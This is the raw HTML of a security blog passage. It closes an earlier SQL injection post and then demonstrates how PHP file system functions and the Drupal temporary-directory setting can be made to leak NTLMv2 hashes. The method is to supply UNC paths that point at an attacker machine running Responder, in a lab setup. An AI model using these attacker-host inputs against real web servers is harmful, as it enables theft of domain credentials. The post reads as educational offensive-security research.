<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NkO6vo2oL51l7kN5I1-uXjKck_ODkYbuz8ggX92_nixIoRoioal1U-LulglkpnSRI3-jB44XbPOqUwt5gF_17pl5kdaB4SCth4BokTsJP4QUAMFcRVUL7XLe70tsdFfvOwOB5B8g5Ss/s1600/17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="244" data-original-width="1022" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NkO6vo2oL51l7kN5I1-uXjKck_ODkYbuz8ggX92_nixIoRoioal1U-LulglkpnSRI3-jB44XbPOqUwt5gF_17pl5kdaB4SCth4BokTsJP4QUAMFcRVUL7XLe70tsdFfvOwOB5B8g5Ss/s1600/17.png" /></a></div>
<br />
SQL injection payload executed successfully and web application showing the output which is "73" (ASCII representation of alphabet "I") <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-0ZBSySJExl39EWZEM77QqmulIgI15rtoa2fQXprxv-etosOJYLpmJDy-90eX4ODh9-eEUxVlyygph7PYysbCWNgtPYBFr6-xyeCn53mez3MTR9qOZexB_9-iNWF-fY8N1aybDMYSpE/s1600/18.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="73" data-original-width="1213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje-0ZBSySJExl39EWZEM77QqmulIgI15rtoa2fQXprxv-etosOJYLpmJDy-90eX4ODh9-eEUxVlyygph7PYysbCWNgtPYBFr6-xyeCn53mez3MTR9qOZexB_9-iNWF-fY8N1aybDMYSpE/s1600/18.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
And to extract the rest of the character of column name, user just need to keep increment the value of substring() second parameter. </div>
<h2 style="text-align: left;">
Conclusion:</h2>
<div style="text-align: left;">
SQL injection exploitation can be tricky but there may be a way to perform it. </div>
<h2 style="text-align: left;">
Remediation:</h2>
<div style="text-align: left;">
To prevent SQL Injection attack, refer OWASP guide:</div>
<div style="text-align: left;">
<a href="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html">https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</a></div>
<br />
Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br /></div>
</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-7858185757924710362020-03-08T16:24:00.002+05:302023-11-23T10:33:55.303+05:30Abusing File System functions in web applications - steal NTLMv2 hash<div dir="ltr" style="text-align: left;" trbidi="on">
In this blog post, we are going to explore the scenario in which web application allow a user to perform file system related operations on files/directories. An attacker can specify the UNC path as input to vulnerable application and web server will make request to attacker controlled server. During the process of communication, attacker controlled server will trick web server to leak NTLMv2 hash. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV7TsmCYitLgdoV8iix8j0Yjr66kCcD3kjEewYvPmY12gNqtb3jzmQaDsCjIcAui_tBhggUqogkf2jppoKew6Bwv-Q10yT-7gf42KP8w9bzhynr9SkxaFPDa9dSHEg-9nmE77Di70HDJQ/s1600/attack-scenario-resp-file-share.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="396" data-original-width="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV7TsmCYitLgdoV8iix8j0Yjr66kCcD3kjEewYvPmY12gNqtb3jzmQaDsCjIcAui_tBhggUqogkf2jppoKew6Bwv-Q10yT-7gf42KP8w9bzhynr9SkxaFPDa9dSHEg-9nmE77Di70HDJQ/s1600/attack-scenario-resp-file-share.png" /></a></div>
<div style="text-align: center;">
Pic credit goes to <a href="https://twitter.com/ka3hk" target="_blank">Ashwath Sir</a></div>
<br />
<span style="color: orange;"><b>Description:</b></span><br />
In programming languages, we have different-different functions which facilitate a user to perform file system related operations.<br />
<br />
Programming language has specific function for specific functionality. <br />
Lets consider the case of PHP (<a href="https://www.php.net/manual/en/ref.filesystem.php" target="_blank">Here is full reference to file system functions available in PHP</a>)<br />
<br />
File related operations<br />
<textarea cols="30" rows="6" style="height: 130px; margin: 0px; width: 300px;">Operation Function
--------------------------
Read File readfile()
write File fwrite()
Edit File fopen()
Delete File unlink()
Copy File copy()
</textarea>
<br />
<br />
<br />
Directory related operations<br />
<textarea cols="30" rows="6" style="height: 110px; margin: 0px; width: 300px;">Operation Function
-------------------------------
Create directory mkdir()
rename directory rename()
change directory chdir()
delete directory rmdir()
</textarea>
<br />
<br />
File system functions allow a user not just to perform operations on local file/directory but also from remote file system ( For ex. SMB server) as well.<br />
To access remote SMB server, file system function needs UNC path as input and parse it (in Windows based machine). <br />
<br />
<span style="color: orange;"><b>Environment Set-up: - </b></span><br />
My demo environment had following things configured in place to perform the issue exploitation:<br />
<span style="background-color: black;"><span style="color: yellow;"><br /> Windows Server 2012 box (IP - 192.168.56.2)<br /> Windows 7 AD Client box (IP - 192.168.56.101)<br /> Backbox Linux box (IP - 192.168.56.106)</span></span><br />
<br />
Windows Server 2012 box: -<br />
This is Active Directory Domain Controller Machine.<br />
<br />
Windows 7 AD Client box: -<br />
This machine has Windows 7 OS installed in it and part of Windows Active Directory Domain. Web application is hosted in this machine and web server is running with the privilege of one of the Windows Active Directory Domain user (user box).<br />
<br />
Backbox Linux box: -<br />
This is attacker machine in which "Responder" tool is listening on port 445 for File Server Service SMB request.<br />
<br />
<br />
<span style="color: orange;"><b>Exploitation scenario:</b></span><br />
So let's suppose, vulnerable web application server is satisfying below mentioned conditions which are required for exploitation:<br />
1.
SMB outbound traffic firewall rule: outgoing traffic must be allowed
for Windows machine on which web application is hosted (SMB port 445)<br />
2. When user supplied data is getting pass to file system function, no other string is getting prepend to it. <br />
<br />
In order to exploit the issue, attacker need to setup "Responder" tool on a remote server.<br />
Windows machine can make SMB request to attacker controlled server and Responder will ask Windows machine to perform Challenge-Response based authentication.<br />
In this process, Responder will steal the NTLMv2 hash from client Windows machine.<br />
<br />
<span style="color: orange;"><b>Vulnerable code and web server environment:</b></span><br />
Web application vulnerable code has interface to perform various operations related file system:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c-uiDgwNc1_vXy3VMmdVekToTSjHy8PP7Ctx_ATVZQ1bFFUVTKGQlHucYmJUNl2qzeW473-c6mji-2BPIGUfY7tGbGr-6MjShOhQ2Np6GlRn-Z4ehjXI8aMCwXiUItxn8uju5aPHTbs/s1600/fs.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="868" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1c-uiDgwNc1_vXy3VMmdVekToTSjHy8PP7Ctx_ATVZQ1bFFUVTKGQlHucYmJUNl2qzeW473-c6mji-2BPIGUfY7tGbGr-6MjShOhQ2Np6GlRn-Z4ehjXI8aMCwXiUItxn8uju5aPHTbs/s1600/fs.png" /></a></div>
<br />
<br />
The vulnerable code is hosted in machine which has "Windows 7" OS installed in it and IP of the machine is "192.168.56.101". This machine is part of Windows Active directory Domain "lab.indishell.lab"<br />
<br />
<br />
<span style="color: orange;"><b>Exploiting Directory operation related file system functions:</b></span><br />
Lets start with functions which help in performing operation on directory. In vulnerable code, we have multiple functions.<br />
<span style="color: orange;"><u><b>Create Directory</b> - mkdir()</u></span>
PHP function <a href="https://www.php.net/manual/en/function.mkdir.php" target="_blank">mkdir()</a> expect 2 arguments:<br />
1. Name of the directory<br />
2. permission which has to be set on the directory<br />
<br />
In my case, Responder is listening on <span style="color: yellow;">IP 192.168.56.106</span>, which need to be specified in input box like this "\\192.168.56.106\b0x". This input basically specifying that mkdir(), create a directory with name "b0x" on remote file share which has IP 192.168.56.106 (Responder is listening on MSB port 445)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlC9CAEdasHk4GsK6u6A1qyYLazQDkIozjVoNEuJbPHx-K_mAvdJ86kB1K7JMJD4Dl2TM_lZTwhJ0wUVDQmbfUzpwpzZ-SSn0-bPwmdMcUCqrwZvgN-PTff2HlzEjg47WPx5tLzHrQh3U/s1600/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlC9CAEdasHk4GsK6u6A1qyYLazQDkIozjVoNEuJbPHx-K_mAvdJ86kB1K7JMJD4Dl2TM_lZTwhJ0wUVDQmbfUzpwpzZ-SSn0-bPwmdMcUCqrwZvgN-PTff2HlzEjg47WPx5tLzHrQh3U/s1600/1.png" /></a></div>
<br />
<br />
The moment "Create directory" clicked, mkdir() parsed the UNC path and tried to create directory "b0x" on Responder listening machine.<br />
Like always, Responder asked Windows machine to pass the "challenge-response" based authetication and Windows machine passed the NTLMv2 hash to Responder.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ1Lq6gL5QNT1x-NrHbY70P62IdUN_fD6u5mlTf0BliCszgg9cMNH6S6r6DaIiz2tfHPC_nJ_PflErvHu4PMo08z_nvBxZ_-hhx3JJhng6uci0BMgkOwD9X399342rr4q0TodOleYZc1k/s1600/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="883" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ1Lq6gL5QNT1x-NrHbY70P62IdUN_fD6u5mlTf0BliCszgg9cMNH6S6r6DaIiz2tfHPC_nJ_PflErvHu4PMo08z_nvBxZ_-hhx3JJhng6uci0BMgkOwD9X399342rr4q0TodOleYZc1k/s1600/3.png" /></a></div>
<br />
<span style="color: orange;"><u><b>Delete directory:</b> rmdir()</u></span><br />
PHP <a href="https://www.php.net/manual/en/function.rmdir.php" target="_blank">rmdir()</a> function expect 1 argument from the user. The argument is the path of the directory which has to be delete.<br />
<br />
In input box, specify the UNC path to Responder listening machine like this "\\192.168.56.106\b0x".<br />
The specified path will instruct rmdir() to delete directory with name "b0x" which is present on remote file system having IP 192.168.56.106.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcbEJYMkMOcYTY8dDaeonaMjqBtFYQN4GipvtoHuw3uXNfKtHyNJXZEFSjOuU74gRW5dcKKjun1gTsnazoYndJI-Zg_YIfB9YYVTahpYrVVfjStzriBIESsJh6CG3L4dB7LnTJQa7GgI/s1600/delete+directory.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="793" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWcbEJYMkMOcYTY8dDaeonaMjqBtFYQN4GipvtoHuw3uXNfKtHyNJXZEFSjOuU74gRW5dcKKjun1gTsnazoYndJI-Zg_YIfB9YYVTahpYrVVfjStzriBIESsJh6CG3L4dB7LnTJQa7GgI/s1600/delete+directory.png" /></a></div>
<br />
Upon clicking "Delete Directory" button, rmdir() function tried to access the directory "b0x" located on IP 192.168.56.106 (Responder listening machine).<br />
Responder tricked Windows machine to pass NTLMv2 hash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCcW4a5VvXVdjcqz7_VdCIMYr5QRkMI481eQHrJoG6dKqJom51hdKyAjXwvSvp60Un-w1wnHIArSbhM9JGRm6Wol9WCY3ICezoo8jh_uerTdD5exWijBhcMp7jTQgIrGtODsOs5GFjis/s1600/delete+directory+2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="850" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCcW4a5VvXVdjcqz7_VdCIMYr5QRkMI481eQHrJoG6dKqJom51hdKyAjXwvSvp60Un-w1wnHIArSbhM9JGRm6Wol9WCY3ICezoo8jh_uerTdD5exWijBhcMp7jTQgIrGtODsOs5GFjis/s1600/delete+directory+2.png" /></a></div>
<br />
<span style="color: orange;"><u><b>List directory:</b></u></span> <br />
PHP list directory functions also process the UNC path and Responder can steal the NTLMv2 hash from the web application server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF8EHuDBXIH6GjE9IuroTrIjtLe8ZrFvUcxsCbnx1j2gobiCp21z6ysdzzpLM6yXbF_1ibgIg5gfW_Gxn9pNgjK5AP2t8Qne4VDoBtwHA-PeqjTqHkfzU2Ak0pux60VR_922phCP3iuE4/s1600/list2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="707" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF8EHuDBXIH6GjE9IuroTrIjtLe8ZrFvUcxsCbnx1j2gobiCp21z6ysdzzpLM6yXbF_1ibgIg5gfW_Gxn9pNgjK5AP2t8Qne4VDoBtwHA-PeqjTqHkfzU2Ak0pux60VR_922phCP3iuE4/s1600/list2.png" /></a></div>
<br />
<br />
<span style="color: orange;"><b>Exploiting File operation related file system functions:</b></span><br />
In vulnerable code, we have multiple file operation functions. Lets try them<br />
<span style="color: orange;"><u><b>Delete File</b> - unlink()</u></span><br />
PHP function <a href="https://www.php.net/manual/en/function.unlink.php" target="_blank">unlink()</a> delete the file specified and expect 1 arguments which path to the file.<br />
<br />
Responder listening on <span style="color: yellow;">IP 192.168.56.106</span>,
which need to be specified in input box like this
"\\192.168.56.106\b0x.txt". This input basically specifying that unlink(), delete file with name "b0x.txt" on remote file share which has IP
192.168.56.106 (Responder is listening on MSB port 445)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjccR2xmgZk8oAfIbnlvfCSOtE-PyXNI04lx_CVnaWLR_VoroUeuDfnovkEew6ARh3ffDMKlG8KaJzQl_dWOcKO6vnhTT_7dHUsJLUUAbMS2S_WVrVFBSwaE7OUjUEhefO5dpSV6tBhHzk/s1600/file_del.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="830" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjccR2xmgZk8oAfIbnlvfCSOtE-PyXNI04lx_CVnaWLR_VoroUeuDfnovkEew6ARh3ffDMKlG8KaJzQl_dWOcKO6vnhTT_7dHUsJLUUAbMS2S_WVrVFBSwaE7OUjUEhefO5dpSV6tBhHzk/s1600/file_del.png" /></a></div>
<br />
The moment clicked the "Delete File" button, unlink() function tried to access remote file system hosted on IP 192.168.56.106 and Responder will steal the NTLMv2 hash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GyMKasUUZgrIqC1gCOTErguHEMgMciOGo6PmBDE-Fjw72gCfLWv-G4oofmj2xdu-QpwhvznCzySOejrI3w8Ka6FvCVRO0Yg-UnQbw5TyylxhQV909zaUC1TEfuX_HLiyQKftqhy38Gc/s1600/file_del2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="741" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GyMKasUUZgrIqC1gCOTErguHEMgMciOGo6PmBDE-Fjw72gCfLWv-G4oofmj2xdu-QpwhvznCzySOejrI3w8Ka6FvCVRO0Yg-UnQbw5TyylxhQV909zaUC1TEfuX_HLiyQKftqhy38Gc/s1600/file_del2.png" /></a></div>
<br />
<span style="color: orange;"><u><b>Copy File</b> - copy()</u></span><br />
PHP function <a href="https://www.php.net/manual/en/function.copy.php" target="_blank">copy()</a> copy the file from specified source to the specified location.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFcCSlcv1FFaQSQ0jFa-b2ZbwRJIXYGjIpk0wqShpmaUMyg8Kc_qxBktY4NMyws8uCOvRCO9SKZqyLDe0AW_eDgBNPsDifm2mEw3up_75rT_MygeQGPhhZJbbHsCmnIo7LCsys4zZPVQ/s1600/copy+file.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFcCSlcv1FFaQSQ0jFa-b2ZbwRJIXYGjIpk0wqShpmaUMyg8Kc_qxBktY4NMyws8uCOvRCO9SKZqyLDe0AW_eDgBNPsDifm2mEw3up_75rT_MygeQGPhhZJbbHsCmnIo7LCsys4zZPVQ/s1600/copy+file.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: orange;"><b>Real life scenario</b></span> - <span style="color: orange;"><b><span style="color: #9fc5e8;">Drupal (Tested on Version 7.6.6)</span> </b></span> </div>
Drupal CMS admin panel has functionality to specify the path to temporary files via "Temporary Directory" input field.<br />
<br />
In Drupal CMS below version 8.2.2, under functional path "Configuration -> File System", there is option to specify the path to temporary files. User can specify the remote file system path as well using UNC path like this "\\remote_file_system_IP\directory_name":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyzxLPJ7qcVNUufLwEuUb6QBXL_oRoU6vVnl4sjoPc87bJcGXYHHmREQ9C82WLx6r2X1oCR7gUaNBoI9IqjXaj0czhGOiS1wY9meGC4SZ3681SmXR4EmWZxn0VutBvQNdS1zrB1ImvZWA/s1600/drupal1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="920" data-original-width="1334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyzxLPJ7qcVNUufLwEuUb6QBXL_oRoU6vVnl4sjoPc87bJcGXYHHmREQ9C82WLx6r2X1oCR7gUaNBoI9IqjXaj0czhGOiS1wY9meGC4SZ3681SmXR4EmWZxn0VutBvQNdS1zrB1ImvZWA/s1600/drupal1.png" /></a></div>
<br />
In this case, I specified the UNC path to my attacker machine on which Respoder is listening on SMB port 445.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIoloxewFoZjIWQSbNgPjR_0xTZr7lVXGMi-qzWdVgqZkkBawjeFq_s2YsdYmUdOSX3HGJAV9zXpaPY7G-QMr56eKAK7DogcVq4H0eLQjqPcFGD_qz31c9iZjmnaKl8fFqIW912JW7cis/s1600/drupal2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIoloxewFoZjIWQSbNgPjR_0xTZr7lVXGMi-qzWdVgqZkkBawjeFq_s2YsdYmUdOSX3HGJAV9zXpaPY7G-QMr56eKAK7DogcVq4H0eLQjqPcFGD_qz31c9iZjmnaKl8fFqIW912JW7cis/s1600/drupal2.png" /></a></div>
<br />
Drupal CMS tried to access the remote file system and Responder grabbed NTLMv2 hash from the web application user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Yr4Z6Lr8L0M1jE5cpQGcEEQzrY9KQdYMcTHEbtBBHNiyZmz-eJyM3IPMTRhgWxbM7dY8lRcTGWOB68TFEWPRAS1FRK9sSvmjLk9k95elm9fVxaXPDYd4rKjouU0bXuvXA5ESvlwzW4M/s1600/drupal3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="793" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4Yr4Z6Lr8L0M1jE5cpQGcEEQzrY9KQdYMcTHEbtBBHNiyZmz-eJyM3IPMTRhgWxbM7dY8lRcTGWOB68TFEWPRAS1FRK9sSvmjLk9k95elm9fVxaXPDYd4rKjouU0bXuvXA5ESvlwzW4M/s1600/drupal3.png" /></a></div>
<br />
Drupal CMS interface error message showing that the script tried to create the directory on remote file system having IP 192.168.1.105 using mkdir() function.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_V_f9RBf2HTknDqEWKB0ToX9c5Zb9IZwA_sXBWGvukmTzFW3vMgvtnuRtlqj65slCLuUkuZFgsNqJHAtl7FZSJlIvqil7gUVLYyrRtSb6WRY_SCJl7EnT8Glgfj_JBYZhEbMTDyky78/s1600/drupal4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="910" data-original-width="1445" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_V_f9RBf2HTknDqEWKB0ToX9c5Zb9IZwA_sXBWGvukmTzFW3vMgvtnuRtlqj65slCLuUkuZFgsNqJHAtl7FZSJlIvqil7gUVLYyrRtSb6WRY_SCJl7EnT8Glgfj_JBYZhEbMTDyky78/s1600/drupal4.png" /></a></div>
<br />
Same behaviour was observed in PHPBB (till version 3.2.3) and Joomla CMS (Latest version) <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br /></div>
